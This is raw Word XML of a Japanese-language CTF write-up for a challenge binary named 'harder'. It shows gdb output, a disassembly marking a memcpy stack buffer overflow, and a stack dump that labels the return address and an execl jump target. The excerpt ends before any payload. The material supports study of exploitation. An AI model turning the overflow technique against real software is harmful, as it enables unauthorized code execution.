          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2095" type="#_x0000_t202" style="width:399.85pt;height:137.05pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2095" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>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hugh@codegate-desktop:/tmp/0071234$ gdb ./harder</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GNU gdb (GDB) 7.0-ubuntu</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Copyright (C) 2009 Free Software Foundation, Inc.</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License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;</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This is free software: you are free to change and redistribute it.</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There is NO WARRANTY, to the extent permitted by law.  Type "show copying"</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and "show warranty" for details.</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This GDB was configured as "i486-linux-gnu".</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For bug reporting instructions, please see:</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&lt;http://www.gnu.org/software/gdb/bugs/&gt;...</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Reading symbols from /tmp/0071234/harder...done.</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRPr="004A5FAD" w:rsidRDefault="008A4C86" w:rsidP="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ターゲットとなるアドレスについては、</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:r w:rsidRPr="004A5FAD">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Pro</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>で調査した。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRPr="004A5FAD" w:rsidRDefault="008A4C86" w:rsidP="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A5FAD">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="004A5FAD">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>08048504</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>の</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>memcpy</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>呼び出しは、</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>に</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>getline</w:t>
      </w:r>
      <w:r w:rsidRPr="004A5FAD">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>で読み取った文字列のポインタ、</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRPr="004A5FAD" w:rsidRDefault="008A4C86" w:rsidP="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>dest</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>に</w:t>
      </w:r>
      <w:r w:rsidRPr="004A5FAD">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>264</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>バイトのスタック、</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>に</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>getline</w:t>
      </w:r>
      <w:r w:rsidRPr="004A5FAD">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>で読み取った長さを与えることになる。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRPr="004A5FAD" w:rsidRDefault="008A4C86" w:rsidP="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>を任意の値に出来るために</w:t>
      </w:r>
      <w:r w:rsidRPr="004A5FAD">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>264</w:t>
      </w:r>
      <w:r w:rsidR="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>文字以上の文字列を入力した場合に</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4C86">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>バッファーオーバーフローが起こる</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6" w:rsidP="00AF29A5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2094" type="#_x0000_t202" style="width:399.85pt;height:182.95pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2094" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>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(gdb) disas 0x080484e4</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Dump of assembler code for function func:</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0x080484e4 &lt;func+0&gt;:    push   %ebp</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0x080484e5 &lt;func+1&gt;:    mov    %esp,%ebp</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0x080484e7 &lt;func+3&gt;:    sub    $0x118,%esp</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0x080484ed &lt;func+9&gt;:    mov    0xc(%ebp),%eax</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0x080484f0 &lt;func+12&gt;:   mov    %eax,0x8(%esp)</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0x080484f4 &lt;func+16&gt;:   mov    0x8(%ebp),%eax</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0x080484f7 &lt;func+19&gt;:   mov    %eax,0x4(%esp)</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0x080484fb &lt;func+23&gt;:   lea    -0x108(%ebp),%eax ; ここがバッファオーバーランのバグ</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0x08048501 &lt;func+29&gt;:   mov    %eax,(%esp)</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0x08048504 &lt;func+32&gt;:   call   0x80483f8 &lt;memcpy@plt&gt;</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0x08048509 &lt;func+37&gt;:   leave</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0x0804850a &lt;func+38&gt;:   ret</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="008A4C86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>End of assembler dump.</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="004A5FAD" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ブレイクポイントを設定しスタックの状態を確認する。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6" w:rsidP="00AF29A5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2093" type="#_x0000_t202" style="width:399.85pt;height:294.55pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2093" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>(gdb) b *0x08048504</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>Breakpoint 1 at 0x8048504</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="MS Mincho" w:hAnsi="DotumChe" w:cs="Tahoma" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>(gdb) r</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>Starting program: /tmp/0071234/harder</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>Input: 123456</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>Breakpoint 1, 0x08048504 in func ()</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>(gdb) x/64xw $esp + 0x118</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>0xbffff738: ebp&gt;0xbffff768  ret&gt;0x08048568  arg&gt;0x0804b008      0x00000078</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>0xbffff748:     0x00393420      0xbffff768      0x00281345 execl_jmp&gt;0x00667d20</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>0xbffff758:     0x00000078 execl_arg&gt;0x0804b008 0x08048590      0x00000000</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>0xbffff768:     0xbffff7e8      0x00268b56      0x00000001      0xbffff814</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>0xbffff778:     0xbffff81c      0xb7fff858      0xbffff7d0      0xffffffff</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>0xbffff788:     0x00675ff4      0x080482dd      0x00000001      0xbffff7d0</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>0xbffff798:     0x00667326      0x00676828      0xb7fffb40      0x00392ff4</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>0xbffff7a8:     0x00000000      0x00000000      0xbffff7e8      0x23ee0b94</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>0xbffff7b8:     0x9116dceb      0x00000000      0x00000000      0x00000000</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
